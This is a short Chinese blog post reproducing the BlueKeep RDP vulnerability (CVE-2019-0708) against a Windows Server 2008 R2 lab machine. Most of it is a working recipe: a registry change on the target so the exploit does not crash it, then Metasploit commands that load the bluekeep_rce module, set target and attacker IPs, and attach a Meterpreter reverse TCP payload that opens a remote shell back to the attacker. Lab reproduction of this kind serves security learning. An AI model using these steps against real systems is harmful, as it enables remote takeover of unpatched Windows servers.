CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

发布于 5个月前 / 56 次围观 / 0 条评论 / 技术学习 / Edwiin

本文最后更新于2020-5-13，已超过 1 个月没有更新，如果文章内容或图片资源失效，请【留言反馈】，我会及时处理，谢谢！

0x01前言

复现完了win7，在来水一篇复现2008的,虽然比较鸡肋。

0x02环境

这里我使用的是 Microsoft Windows Server 2008 R2 Enterprise

0x03复现

首先要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp\fDisableCam为 0(好鸡肋啊!!!) 不修改的话我测试都是蓝屏

然后启动msf使用模块(没有配置模块的可以看看我前面的文章)

use exploit/rdp/cve_2019_0708_bluekeep_rce

然后配置参数

set RDP_CLIENT_IP 192.168.0.121 //设置自己的ip

set RHOSTS 192.168.0.116 //设置靶机ip

set target 1//设置1

set payload windows/x64/meterpreter/reverse_tcp //设置payload

set lhost 192.168.0.121 //设置自己的ip

小火车启动嘟嘟嘟

复现成功。

技术分享技术学习 CVE-2019-0708 远程桌面网络安全信息安全漏洞攻击漏洞复现

0 打赏

Edwiin 1350篇文章 163条评论 TA主页联系Ta

描述: 还好有你，再见如初。

遇见心流

CVE-2019-0708 远程桌面代码执行漏洞Windows Server 2008复现

0x01前言

0x02环境

0x03复现

这是她们的《奇异人生》——览尽世界，为你沉沦

CVE-2019-0708 远程桌面代码执行漏洞复现

Press Space to start